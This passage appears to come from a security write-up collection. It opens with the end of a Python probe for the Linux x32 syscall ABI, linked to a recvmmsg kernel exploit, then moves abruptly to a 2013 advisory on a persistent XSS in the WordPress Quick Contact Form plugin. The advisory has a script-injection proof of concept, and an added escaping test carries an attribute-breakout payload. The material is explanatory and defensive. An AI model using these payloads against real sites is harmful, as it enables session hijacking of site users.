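            res, err = _syscall(X32_SYSCALL_BIT | NR_GETPID)
            if res == os.getpid():
                code = 0
            elif res == -1:
                code = err or 255
            else:
                code = 255
        except Exception:
            code = 255
        os._exit(code)
    _, status = os.waitpid(pid, 0)
    if os.WIFSIGNALED(status):
        return False, f'killed by signal {os.WTERMSIG(status)}'
    code = os.WEXITSTATUS(status)
    if code == 0:
        return True, 'x32 syscall serviced'
    return False, errno.errorcode.get(code, f'exit status {code}')


def probe_report():
    enabled, detail = x32_probe()
    return {
        'platform_applies': on_x86_64_linux(),
        'native_getpid_matches': native_getpid_matches(),
        'x32_abi_enabled': enabled,
        'x32_detail': detail,
    }


if __name__ == '__main__':
    for key, value in probe_report().items():
        print(f'{key}: {value}')
```

A True result only says the ABI is reachable; whether recvmmsg's timeout handling is still the vulnerable one depends on the kernel build date, which the exploit's hardcoded offset table also shows is the real constraint on this code.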

WordPress Quick Contact Form Plugin 6.0 – Persistent XSS


A persistent XSS vulnerability has been found in WordPress Quick Contact Form Plugin 6.0; where it occurs and how it is used are described below.

===============================================================================
|                                                                             |
                         ____                     _ __
              ___  __ __/ / /__ ___ ______ ______(_) /___ __
             / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /
            /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /
                                                     /___/ team

                          PUBLIC SECURITY ADVISORY
|                                                                             |
===============================================================================

TITLE
=====

Quick Contact Form - Persistent Cross Site Scripting Vulnerability

AUTHOR
======

Zy0d0x

DATE
====

10/06/2013

VENDOR
======

Quick Plugins - http://quick-plugins.com/

AFFECTED PRODUCT
================

Quick Contact Form  WordPress Plugin Version 6.0 possibly earlier

VULNERABILITY CLASS
===================

Cross-Site Scripting

DESCRIPTION
===========

Quick Contact Form suffers from a persistent Cross-Site Scripting vulnerability due to a lack
of input validation and output sanitization of the qcfname4 parameter.
Other input fields are also susceptible to reflected cross-site scripting.

PROOF OF CONCEPT
================

Enter the following into the field where Quick Contact Form requests a Message.

--- SNIP ---

"><script>alert(String.fromCharCode(90,121,48,100,48,120))</script><

--- SNIP ---

If the message has been sent successfully, an alert dialog containing Zy0d0x will appear when a user checks the message in the dashboard.

IMPACT
======

An attacker could potentially hijack the session authentication tokens of remote users and leverage the
vulnerability to extend the attack to the underlying software and operating system of the victim.

THREAT LEVEL
============

High

STATUS
======

Fixed; update to version 6.1.

DISCLAIMER
==========

nullsecurity.net hereby emphasizes that the information published here is
for educational purposes only. nullsecurity.net does not take any responsibility for
any abuse or misuse!
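The proof of concept above opens with `">`: the stored message is echoed into a quoted attribute on the dashboard, so the quote and the bracket close that attribute and the tag before `<script>` starts. The following added example, not the plugin's code, renders a message into such an attribute unescaped, with only the angle brackets escaped, and with full attribute escaping, and parses the result to see whether a script element or an event-handler attribute came out. The ATTR_ONLY payload is added here, not from the advisory, to show why escaping angle brackets alone is not enough: a breakout that never uses `<` gets through it.

```python
"""Escaping checks for a message echoed into a value attribute.
Added example, not the plugin's code."""
import html
from html.parser import HTMLParser

# Payload from the advisory's proof of concept.
POC = '"><script>alert(String.fromCharCode(90,121,48,100,48,120))</script><'
# Constructed variant with no angle brackets: only the quote does the work.
ATTR_ONLY = '" onfocus="alert(1)" autofocus="'


def render(msg, escaper=None):
    """Dashboard fragment echoing the stored message into a value attribute."""
    value = msg if escaper is None else escaper(msg)
    return f'<input type="text" name="qcfname4" value="{value}">'


def escape_angle_only(s):
    """The incomplete fix: stops <script> but leaves quotes alone."""
    return s.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')


def escape_attr(s):
    """html.escape with quote=True encodes &, <, >, " and ', which is what a
    double-quoted attribute needs."""
    return html.escape(s, quote=True)


class _Tags(HTMLParser):
    """Collects (tag, attrs) for every start tag the fragment parses to."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def _parse(fragment):
    p = _Tags()
    p.feed(fragment)
    p.close()
    return p.tags


def executes(fragment):
    """True if the fragment parses to a <script> element or to any tag with an
    on* attribute, i.e. the message broke out of the attribute."""
    return any(tag == 'script' or any(name.startswith('on') for name in attrs)
               for tag, attrs in _parse(fragment))


def stored_value(fragment):
    """The value attribute as a browser would read it back (entities decoded)."""
    tags = _parse(fragment)
    return tags[0][1].get('value') if tags else None


if __name__ == '__main__':
    for label, escaper in (('unescaped', None),
                           ('angle brackets only', escape_angle_only),
                           ('attribute escaping', escape_attr)):
        print(label, 'POC executes:', executes(render(POC, escaper)),
              'ATTR_ONLY executes:', executes(render(ATTR_ONLY, escaper)))
```

With full attribute escaping the original text survives intact in the value (stored_value returns the payload unchanged), which is the behaviour a contact-form dashboard wants: display what was submitted, execute none of it.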